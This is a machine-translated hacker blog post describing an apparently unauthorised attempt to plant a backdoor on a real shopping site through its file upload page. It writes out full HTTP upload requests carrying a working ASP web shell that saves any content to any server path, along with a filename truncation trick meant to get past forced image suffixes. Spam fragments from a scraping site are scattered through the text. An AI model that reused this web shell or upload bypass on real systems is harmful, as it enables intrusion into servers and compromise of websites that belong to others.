A small file upload test

At pm, I was about to have dinner. During this time, I liked to take a short vacation for myself who had been busy for a day. So I ran to several frequent hacker sites to check my articles, I still like the 315 Security Network in Wuhan. There are many things and the updates are still timely.
I remember seeing an animation of a worker in the 315 Security Net that used to allocate the server's hard disk permissions. I learned that it was a virtual host and ran it with a program I wrote, see if there is anything you can use and find an upload page for a dynamic Shopping Mall ......
Http://www.whdlwj.com/upload_flash.asp? Formname = myform & editname = bookpic & uppath = bookpic & filelx = JPG
I grabbed a package and tried to upload it. The result of the package is as follows:

Post/upfile_flash.asp HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash, application/vnd. MS-Excel, application/vnd. MS-PowerPoint, application/MSWord ,*/*
Referer: http://www.whdlwj.com/upload_flash.asp? Formname = myform & editname = bookpic & uppath = bookpic & filelx = JPG
Accept-language: ZH-CN
Content-Type: multipart/form-data; boundary = --------------------------- 7d51863950254 09hr.com
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv1; Maxthon;. Net CLR 1.1.4322)
HOST: www.whdlwj.com
Content-Length: 3306
Connection: keep-alive
Cache-control: No-Cache
COOKIE: aspsessionidcarbbdss = ndplmaibcafleemecjonpjjj

----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "filepath"

Bookpic/
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "filelx"

JPG
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "editname"

Bookpic
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "formname"

Myform
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "act"

Uploadfile
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "file1"; filename = "G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save. ASP "Search so.bitscn.com
Content-Type: Application/octet-stream

<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Createobject ("scripting. FileSystemObject") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "Save success! "%>
<% Else %>
<% Response. Write "Save unsuccess! "%>
<% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write"
"%> <% Response. Write" absolute path of the file to be saved (including file name: for example, D:/web/sys. asp): "%>

Play.bitscn.com games

<% Response. Write "" %>
<% Response. Write"
"%>

<% Response. Write "absolute path of this file:" %>
<% = Server. mappath (request. servervariables ("script_name") %>

<% Response. Write"
"%>
<% Response. Write "content of the input horse:" %>

<% Response. Write "" %>

<% Response. Write "" %>
<% Response. Write"
"%>
Save file workstation beautify the version
---- Power by Perl

----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "Submit"

Start upload
----------------------------- 7d51863950254 --

Test the data packet according to the normal means. The submitted result is returned as follows:
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2005 10:05:24 GMT
Server: Microsoft-Microsoft IIS/6.0
X-powered-by: ASP. NET
Content-Length: 493
Content-Type: text/html
Cache-control: Private

Search so.bitscn.com

ADODB. Stream error '800a0bbc'

Failed to Write File.

/Upload_wj.inc, row 181 <
/Font>

If we know from the returned data that the root directory restricts file writing, we will change the upload path in the package to bookpic/sys. asp, and change the byte to 3314. The prompt is as follows:
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 10:07:54 GMT
Server: Microsoft-Microsoft IIS/6.0
X-powered-by: ASP. NET
Content-Length: 472
Content-Type: text/html
Cache-control: Private

Hey, the file has been uploaded successfully, but don't worry. You can see that the returned data of the package is bookpic/sys.asp20054181875495496.gif. Opening this file is our backdoor file code. It's a bit difficult to transfer it to this place. Take a closer look at the file name bookpic/sys.asp20054181875495496.gif. How is it? Is there any idea? Haha ......
Our file suffix. asp is retained, but it adds a long string and GIF suffix to us, turning our ASP file into a GIF file. Because I have not read the file upload code of this program, I rely on experience to modify the backdoor data packet and let it cut off the subsequent parts. The modified data packet is as follows:
Post/upfile_flash.asp HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash, application/vnd. MS-Excel, application/vnd. MS-PowerPoint, application/MSWord ,*/*

Bitscn_com

Referer: http://www.whdlwj.com/upload_flash.asp? Formname = myform & editname = bookpic & uppath = bookpic & filelx = JPG
Accept-language: ZH-CN
Content-Type: multipart/form-data; boundary = --------------------------- 7d51863950254
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv1; Maxthon;. Net CLR 1.1.4322)
HOST: www.whdlwj.com
Content-Length: 3316
Connection: keep-alive
Cache-control: No-Cache
COOKIE: aspsessionidcarbbdss = ndplmaibcafleemecjonpjjj

----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "filepath"

Bookpic/Wolf. asp
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "filelx"

JPG
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "editname"

Bookpic
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "formname"

Bitscn.com China Network Management Alliance

Myform
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "act"

Uploadfile
----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "file1"; filename = "G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.asp.gif"
Content-Type: Application/octet-stream

<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Createobject ("scripting. FileSystemObject") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "Save success! "%>
<% Else %>
<% Response. Write "Save unsuccess! "%> 09hr.com Network Administrator job
<% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write"
"%> <% Response. Write" absolute path of the file to be saved (including file name: for example, D:/web/sys. asp): "%>

<% Response. Write "" %>
<% Response. Write"
"%>

<% Response. Write "absolute path of this file:" %>
<% = Server. mappath (request. servervariables ("script_name") %>

<% Response. Write"
"%>
<% Response. Write "content of the input horse:" %>

<% Response. Write "" %>

<% Response. Write "" %>
<% Response. Write"
"%>
Save file workstation beautify the version
---- Power by Perl

----------------------------- 7d51863950254
Content-Disposition: Form-data; name = "Submit"

Start uploading www.bitscn.net Network Management blog
----------------------------- 7d51863950254 --

The entire package has not changed. You only need to change the G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.gif In the first modified package to G: /backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.asp.gif, and the rest will not change. The upload window is closed in a flash (because I used a bat to execute the submission ...... Although no results are returned, I know that the data has been truncated at this time, and the file is changed to ASP normally. Go to the backdoor and check that the browser displays:

This page cannot be displayed
You attempt to execute CGI, ISAPI, or other executable programs from the directory, but this directory does not allow execution of programs.
--------------------------------------------------------------------------------

Please try the following operations:

If you believe that the directory should allow access, contact the website administrator.
HTTP Error 403.1-Access prohibited: Access denied.
Internet Information Service (IIS)

Hey hey ...... If this display is available, it indicates OK. You can upload the ASP file, and then change the directory to try again. No file writing is allowed !. This image directory does not allow execution of our backdoor.
After all, it is the host of a secure website. You can do this in terms of directory restrictions and permission settings. If you get hacked, you will be ashamed of it. Here, the entire test is over. I don't know what you think after reading it. Although I didn't get the shell, what I want to highlight is the idea in the article, what we usually need is to accumulate more experience and pay more attention to the application. It is not particularly difficult to find a small thing. (Don't lose your eggs if you are unhappy with the article. I am afraid of eating it. I am lucky to get the money. I am poor ~~~).